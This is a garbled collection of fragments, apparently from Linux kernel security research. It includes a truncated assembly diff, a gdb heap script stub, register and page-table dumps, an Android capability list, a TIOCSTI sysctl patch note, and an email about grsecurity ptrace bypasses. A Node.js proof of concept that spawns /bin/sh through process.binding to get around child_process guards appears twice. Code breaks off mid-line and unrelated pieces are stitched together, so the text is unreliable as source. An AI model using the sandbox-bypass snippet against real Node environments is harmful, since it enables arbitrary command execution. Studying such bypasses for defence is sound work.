
diff --git a/arch/x86/entry/entry_64.S b/arch/x86/entry/entry_64.S
index 957dfb693ecc..251ed2ca3f04 100644
--- a/arch/x86/entry/entry_64.S
+++ b/arch/x86/entry/entry_64.S
@@ -1673,9 +1673,26 @@ ENTRY(rewind_stack_do_exit)
/* Prevent any naive code from trying to unwind to our caller. */
xorl %ebp, %ebp
+ movq %rdi, %r14
+
import os
import struct
# The allocator stores its per-chunk flag bits in the low three bits of
# the chunk size field; AND with this mask to isolate them.
FLAGS_MASK = 0x7
# Pagemap entry bits, as the names say: bit 63 = page present,
# bit 62 = page swapped out.
PAGEMAP_PRESENT = 1 << 63
PAGEMAP_SWAPPED = 1 << 62
main_arena = gdb.parse_and_eval('&main_arena')
bins_per_arena = int(gdb.parse_and_eval(
// small stack memory usage experiment
// written by Jann Horn
#include <stdint.h>
#include <sys/ptrace.h>
#include <sys/user.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <stdlib.h>
0x0 Twux 0x7aa7000
0x0 Twux 0x8b4bf000
0x400000 Twux 0x77c9000
0x400000 P-ux 0x11f46000
0x600000 Twux 0x72da000
0x600000 P-u- 0x11f47000L
0x601000 Pwu- 0x11ec8000L
0x1e00000 Twux 0x79fb000
0x1f13000 Pwu- 0x11f7a000L
0x1f14000 Pwu- 0x11f7b000L
$ ./perf_sample_regs_intr_demo
data_head is at ff0
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0x4005b0
rax=0xfffffffffffffff7 rbp=0xffffa5fc43efff48 rsp=0xffffa5fc43efff28 rip=0xffffffff97c55f1d
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0xffff8fc3ba3b79c0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef0 rip=0xffffffff97c745c9
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce18
rax=0x0 rbp=0xffffa5fc43efff00 rsp=0xffffa5fc43effef8 rip=0xffffffff97c75049
rax=0xfffffffffffffff7 rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040b8 rip=0xffffffff9862ce15
rax=0xffffffffffffffff rbp=0x7ffc9ec04170 rsp=0x7ffc9ec040c0 rip=0x4007d5
init root allcaps
ueventd root allcaps
logd CAP_AUDIT_CONTROL CAP_SYSLOG
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
qseecomd CAP_NET_RAW CAP_SYS_RAWIO CAP_SYS_ADMIN
debuggerd root allcaps
debuggerd64 root allcaps
vold root allcaps
debuggerd64:sig root allcaps
debuggerd:sig root allcaps
// Spawns a shell through Node's internal `process_wrap` binding rather than
// the public `child_process` module. Presumably a proof of concept that a
// guard placed only on `child_process` does not prevent command execution —
// confirm against the gist's context.
var Process = process.binding('process_wrap').Process;
var proc = new Process();
// Exit callback is installed but ignores both of its arguments.
proc.onexit = function(a,b) {};
// The binding is handed the environment as an array of "KEY=value" strings.
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
// Runs `/bin/sh -c 'id > /tmp/owned'` with all three stdio streams ignored;
// the file written to /tmp/owned is the only visible evidence it ran.
// NOTE(review): from a defender's side, a Node process forking /bin/sh is a
// useful detection signal, and reachability of process.binding() should be
// treated as equivalent to arbitrary code execution when sandboxing.
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
From cd0bd8ae7e4afb8050657b73d65e3ddeccd44b9b Mon Sep 17 00:00:00 2001
From: Jann Horn <jann@thejh.net>
Date: Sat, 12 Dec 2015 02:59:28 +0100
Subject: [PATCH] drivers/tty: add protected_ttys sysctl
This new fs.protected_ttys sysctl can be set to 1 to require
CAP_SYS_ADMIN for the TIOCSTI ioctl (which lets the caller
push input back into the TTY and thereby fake input to other
processes that read from the same TTY).
// Spawns a shell through Node's internal `process_wrap` binding rather than
// the public `child_process` module. Presumably a proof of concept that a
// guard placed only on `child_process` does not prevent command execution —
// confirm against the gist's context.
var Process = process.binding('process_wrap').Process;
var proc = new Process();
// Exit callback is installed but ignores both of its arguments.
proc.onexit = function(a,b) {};
// The binding is handed the environment as an array of "KEY=value" strings.
var env = process.env;
var env_ = [];
for (var key in env) env_.push(key+'='+env[key]);
// Runs `/bin/sh -c 'id > /tmp/owned'` with all three stdio streams ignored;
// the file written to /tmp/owned is the only visible evidence it ran.
// NOTE(review): from a defender's side, a Node process forking /bin/sh is a
// useful detection signal, and reachability of process.binding() should be
// treated as equivalent to arbitrary code execution when sandboxing.
proc.spawn({file:'/bin/sh',args:['sh','-c','id > /tmp/owned'],cwd:null,windowsVerbatimArguments:false,detached:false,envPairs:env_,stdio:[{type:'ignore'},{type:'ignore'},{type:'ignore'}]});
Date: Sun, 28 Feb 2016 19:08:22 +0100
From: Jann Horn <jann@thejh.net>
To: Brad Spengler <spender@grsecurity.net>
Subject: GRKERNSEC_PTRACE_READEXEC bypasses
Hi!
While writing some new kernel documentation (not yet public, but will probably
soon be under Documentation/security/ptrace_checks.txt), I noticed that
GRKERNSEC_PTRACE_READEXEC has some issues.